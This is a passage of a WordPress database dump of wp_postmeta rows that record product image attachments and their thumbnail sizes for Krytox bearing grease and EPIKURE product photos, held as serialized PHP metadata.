ientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12101, 1046, '_wp_attached_file', '2016/08/EPIKURE-3000-series.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12102, 1047, '_wp_attached_file', '2016/08/krytox-bearing-grease1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12103, 1047, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4800;s:6:"height";i:1728;s:4:"file";s:34:"2016/08/krytox-bearing-grease1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"krytox-bearing-grease1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"krytox-bearing-grease1-800x288.jpg";s:5:"width";i:800;s:6:"height";i:288;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"krytox-bearing-grease1-768x276.jpg";s:5:"width";i:768;s:6:"height";i:276;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"krytox-bearing-grease1-1600x576.jpg";s:5:"width";i:1600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"krytox-bearing-grease1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"krytox-bearing-grease1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"krytox-bearing-grease1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"krytox-bearing-grease1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12104, 1046, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:31:"2016/08/EPIKURE-3000-series.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:31:"EPIKURE-3000-series-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:31:"EPIKURE-3000-series-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"EPIKURE-3000-series-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:33:"EPIKURE-3000-series-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:31:"EPIKURE-3000-series-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:31:"EPIKURE-3000-series-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:31:"EPIKURE-3000-series-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:31:"EPIKURE-3000-series-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12105, 1048, '_wp_attached_file', '2016/08/krytox-bearing-grease2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12106, 1048, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6400;s:6:"height";i:4800;s:4:"file";s:34:"2016/08/krytox-bearing-grease2.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"krytox-bearing-grease2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"krytox-bearing-grease2-800x600.jpg";s:5:"width";i:800;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"krytox-bearing-grease2-768x576.jpg";s:5:"width";i:768;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"krytox-bearing-grease2-1600x1200.jpg";s:5:"width";i:1600;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"krytox-bearing-grease2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"krytox-bearing-grease2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"krytox-bearing-grease2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"krytox-bearing-grease2-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12107, 1002, '_thumbnail_id', '1047'); 
INSERT INTO `wp_postmeta` VALUES (12108, 1049, '_wp_attached_file', '2016/08/krytox-bearing-grease3.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12109, 1049, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:34:"2016/08/krytox-bearing-grease3.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"krytox-bearing-grease3-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"krytox-bearing-grease3-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"krytox-bearing-grease3-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"krytox-bearing-grease3-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"krytox-bearing-grease3-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"krytox-bearing-grease3-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"krytox-bearing-grease3-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"krytox-bearing-grease3-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12110, 1050, '_wp_attached_file', '2016/08/krytox-bearing-grease4.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12111, 1050, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3504;s:6:"height";i:2336;s:4:"file";s:34:"2016/08/krytox-bearing-grease4.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"krytox-bearing-grease4-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"krytox-bearing-grease4-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"krytox-bearing-grease4-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"krytox-bearing-grease4-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"krytox-bearing-grease4-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"krytox-bearing-grease4-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"krytox-bearing-grease4-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"krytox-bearing-grease4-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12112, 1051, '_wp_attached_file', '2016/08/krytox-bearing-grease5.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12113, 1051, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5000;s:6:"height";i:5000;s:4:"file";s:34:"2016/08/krytox-bearing-grease5.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"krytox-bearing-grease5-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"krytox-bearing-grease5-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"krytox-bearing-grease5-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"krytox-bearing-grease5-1600x1600.jpg";s:5:"width";i:1600;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"krytox-bearing-grease5-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"krytox-bearing-grease5-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"krytox-bearing-grease5-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"krytox-bearing-grease5-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12114, 1052, '_wp_attached_file', '2016/08/krytox-bearing-grease6.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12115, 1052, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5000;s:6:"height";i:3333;s:4:"file";s:34:"2016/08/krytox-bearing-grease6.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"krytox-bearing-grease6-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"krytox-bearing-grease6-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"krytox-bearing-grease6-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"krytox-bearing-grease6-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"krytox-bearing-grease6-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"krytox-bearing-grease6-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"krytox-bearing-grease6-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"krytox-bearing-grease6-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12116, 1009, '_thumbnail_id', '1048'); 
INSERT INTO `wp_postmeta` VALUES (12117, 1010, '_thumbnail_id', '1049'); 
INSERT INTO `wp_postmeta` VALUES (12118, 1011, '_thumbnail_id', '1050'); 
INSERT INTO `wp_postmeta` VALUES (12119, 1012, '_thumbnail_id', '1051'); 
INSERT INTO `wp_postmeta` VALUES (12120, 1014, '_thumbnail_id', '1052'); 
INSERT INTO `wp_postmeta` VALUES (12121, 1053, '_wp_attached_file', '2016/08/EPIKURE-3100-marine.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12122, 1053, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:2000;s:4:"file";s:31:"2016/08/EPIKURE-3100-marine.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:31:"EPIKURE-3100-marine-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:31:"EPIKURE-3100-marine-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"EPIKURE-3100-marine-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:33:"EPIKURE-3100-marine-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:31:"EPIKURE-3100-marine-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:31:"EPIKURE-3100-marine-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:31:"EPIKURE-3100-marine-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:31:"EPIKURE-3100-marine-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12123, 1054, '_wp_attached_file', '2016/08/EPIKURE-3200-series.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12124, 1054, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:2000;s:4:"file";s:31:"2016/08/EPIKURE-3200-series.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:31:"EPIKURE-3200-series-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:31:"EPIKURE-3200-series-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"EPIKURE-3200-series-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:33:"EPIKURE-3200-series-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:31:"EPIKURE-3200-series-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:31:"EPIKURE-3200-series-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:31:"EPIKURE-3200-series-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:31:"EPIKURE-3200-series-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12125, 1055, '_wp_attached_file', '2016/08/EPIKURE-3300-.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12126, 1055, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5228;s:6:"height";i:3486;s:4:"file";s:25:"2016/08/EPIKURE-3300-.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:25:"EPIKURE-3300--340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:25:"EPIKURE-3300--800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"EPIKURE-3300--768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"EPIKURE-3300--1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:25:"EPIKURE-3300--250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"EPIKURE-3300--200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"EPIKURE-3300--225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:25:"EPIKURE-3300--510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12127, 1056, '_wp_attached_file', '2016/08/krytox-bearing-grease155.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12128, 1056, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5760;s:6:"height";i:3840;s:4:"file";s:36:"2016/08/krytox-bearing-grease155.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:36:"krytox-bearing-grease155-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:36:"krytox-bearing-grease155-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:36:"krytox-bearing-grease155-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:38:"krytox-bearing-grease155-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:36:"krytox-bearing-grease155-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:36:"krytox-bearing-grease155-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:36:"krytox-bearing-grease155-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:36:"krytox-bearing-grease155-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12129, 1057, '_wp_attached_file', '2016/08/krytox-bearing-grease234.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12130, 1057, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5322;s:6:"height";i:3548;s:4:"file";s:36:"2016/08/krytox-bearing-grease234.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:36:"krytox-bearing-grease234-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:36:"krytox-bearing-grease234-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:36:"krytox-bearing-grease234-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:38:"krytox-bearing-grease234-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:36:"krytox-bearing-grease234-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:36:"krytox-bearing-grease234-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:36:"krytox-bearing-grease234-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:36:"krytox-bearing-grease234-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12131, 1058, '_wp_attached_file', '2016/08/EPIKURE-W.jpg'); 
